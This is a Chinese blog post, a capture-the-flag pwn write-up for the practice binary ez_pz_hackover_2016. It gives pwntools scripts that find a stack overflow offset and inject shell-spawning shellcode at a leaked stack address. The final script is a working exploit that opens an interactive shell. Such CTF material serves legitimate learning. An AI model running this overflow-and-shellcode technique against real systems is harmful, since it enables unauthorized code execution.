ez_pz_hackover_2016

最新推荐文章于 2025-02-19 19:37:14 发布
最新推荐文章于 2025-02-19 19:37:14 发布
阅读量352 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/pondzhang/article/details/106067976
本文介绍了一种测试栈溢出偏移量和shellcode偏移的方法,通过使用pwntools库,详细展示了如何在特定环境中找到正确的偏移量,以实现对程序的控制。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

测试栈溢出偏移量

from pwn import *

p = process('./ez_pz_hackover_2016')
libc = ELF('/lib/i386-linux-gnu/libc.so.6')
elf = ELF('./ez_pz_hackover_2016')
context.log_level = 'debug'
context.arch = elf.arch
payload = 'crashme\x00' + 'aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaa'
gdb.attach(p,'b *0x08048601')
p.sendline(payload)

cyclic -l 0x61666161

18+8 = 26

测试shellcode偏移

from pwn import *
p = process('./ez_pz_hackover_2016')
libc = ELF('/lib/i386-linux-gnu/libc.so.6')
elf = ELF('./ez_pz_hackover_2016')
context.log_level = 'debug'
context.arch = elf.arch
p.recvuntil('Yippie, lets crash: 0x')
retaddr = int(p.recv(8),16)
log.success(hex(retaddr))
p.recvuntil('>')
payload = 'crashme\x00'.ljust(26, '\x00') + asm(shellcraft.sh())
gdb.attach(p,'b *0x08048601')
p.sendline(payload)

0xfff79f7c - 0xfff79f5c + 4 =28

payload如下:

from pwn import *
p = process('./ez_pz_hackover_2016')
libc = ELF('/lib/i386-linux-gnu/libc.so.6')
elf = ELF('./ez_pz_hackover_2016')
context.log_level = 'debug'
context.arch = elf.arch
p.recvuntil('Yippie, lets crash: 0x')
retaddr = int(p.recv(8),16)
log.success(hex(retaddr))
p.recvuntil('>')
payload = 'crashme\x00'.ljust(26, '\x00') +p32(retaddr - 28) + asm(shellcraft.sh())
p.sendline(payload)
p.interactive()
BUUCTF pwn ez_pz_hackover_2016
菜的只能随便写写博客
02-21 2469
0x01 文件分析  没有不可执行栈和段上的读写保护,可以做到很多事情。   0x02 运行  输入name并且回显,上面还有一个地址。   0x03 IDA  主要的漏洞点在这个函数内部的,chall栈的大小很大,足够写入shellcode,之后的vuln函数会将s的数据复制到vuln的栈上面,但是复制的数据量远远大于栈的长度,会造成栈溢出。  并且此函数的栈的地址直接打印出来,不用再去...
3S软件
Zzzpiu的博客
12-29 513
地址:https://www.ixxin.cn/software.html 转载地址:https://www.ixxin.cn/software.html
BUUCTF ez_pz_hackover_2016
最新发布
2401_88087539的博客
02-19 725
pwn新手小白,写完题后整理的一点点思路,有借鉴其他wp,有任何问题各位师傅可以提出,接收批评指正
BUUCTF ez_pz_hackover_2016[动态调试之初入门]
weixin_45441024的博客
01-26 628
BUUCTF ez_pz_hackover_2016[动态调试之初入门] 之前做题基本上都是放到IDA里面进行分析,所以在动态调试这方面一直有所欠缺,今天这道题就弥补了这个不足,真正地走进了栈题的动态调试 先check一下,发现什么保护都没有开,还是一个32位的程序,心里不免有些小激动,难道这题简单? 不管简单与否,我们都先运行一下,发现在输入之前回显给我们一个栈地址,并且这个地址不是固定的,所以这里一定会用到,拿小本本记下来,之后程序会将我们输入的东西打印出来 之后我们进到IDA来分析一下这个程序
BUUCTF pwn ez_pz_hackover_2016(write up)
qq_44768749的博客
08-23 543
BUUCTF pwn ez_pz_hackover_20160x01 文件分析0x02 运行0x03 IDA0x04 思路0x05 exp 0x01 文件分析 没有不可执行栈和段上的读写保护。 0x02 运行 输入name后发现上面还有一个地址。 0x03 IDA 若输入crashme,即可进入vlun函数,主要的漏洞点在这个函数内部的,chall栈的大小很大,足够写 入shellcode,之后的vuln函数会将name的数据复制到vuln的栈上面,而且复制的数据量远远大于栈的 长度,会造
【CTF题解NO.00004】BUUCTF/BUUOJ - Pwn write up by arttnb3
arttnba3的博客
11-20 1565
GITHUB BLOG LINK THERE 文章目录[GITHUB BLOG LINK THERE](https://archive.next.arttnba3.cn/2020/09/08/%E3%80%90CTF%E9%A2%98%E8%A7%A3-0x04%E3%80%91BUUOJ-Pwn-write-up-by-arttnb3/)0x000.绪论0x001.test your nc - nc0x002.rip - ret2text0x003.warmup_csaw_2016 - ret2text0
[buu]ez_pz_hackover_2016
Lt95625142的博客
12-23 431
所以这里我们回到的地址应该是在0x0xff8c1e90这个地址上,接下来我们有的地址是0xff8c1eac,怎么表示这个地址呢?这里很可能存在溢出了,这里可以控制我们返回地址的写入(当然这个题在这里打ret2libc也是可以的,但这里libc基地址不太好算(要不传统打法返回两次,这里返回打起来有点点麻烦没shellcode快))(这里其实我们有两个程序栈,一个是chall对应的栈,另一个是vuln对应的程序栈(这个理解成代码需要的内存空间),但这个算出来最后其实不是我们实际要覆盖的返回地址)
BUUCTF-ez_pz_hackover_2016
Rt1Text的博客
11-28 837
challC 库函数 - strcmp()C 库函数 int strcmp(const char *str1, const char *str2) 把 str1 所指向的字符串和 str2 所指向的字符串进行比较。strcmp只能比较字符串,比较数组和字符串常量,不能比较数字等其他形式的参数。两个字符串自左向右逐个字符相比(按ASCII值大小相比较),直到出现不同的字符或遇'\0'为止strcmp的返回值可控,传入空字符串即可strlen同样遇0截断。
[BUUCTF-pwn]——ez_pz_hackover_2016
Y_peak的博客
02-15 386
[BUUCTF-pwn]——ez_pz_hackover_2016 题目地址:https://buuoj.cn/challenges#ez_pz_hackover_2016 checksec一下,NX都没开,十有八九是让自己写shellcode了 在IDA中,main里面没什么可以看的. 在chall函数中发现,0x40C = 1036 > 1023无法栈溢出。不过总算找到可以写shellcode 的地方。 发现vuln函数,只要通过输入"crashme\x00"就可以绕过检查,执行vuln
memcpy
weixin_45959515的博客
08-26 228
memcpy指的是C和C++使用的内存拷贝函数,函数原型为void *memcpy(void *destin, void *source, unsigned n);函数的功能是从源内存地址的起始位置开始拷贝若干个字节到目标内存地址中,即从源source中拷贝n个字节到目标destin中。 memcpy(c, temp, sizeof(char) * temp_size); ...
EZ_USB通用驱动程序详细使用说明
标题:“EZ_USB 通用驱动程序说明”反映了一个特定于EZ_USB设备的通用驱动程序的相关信息。EZ_USB是由Cypress Semiconductor公司生产的一系列USB微控制器。该驱动程序是用于与这些USB设备进行通信的软件组件。在讨论...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值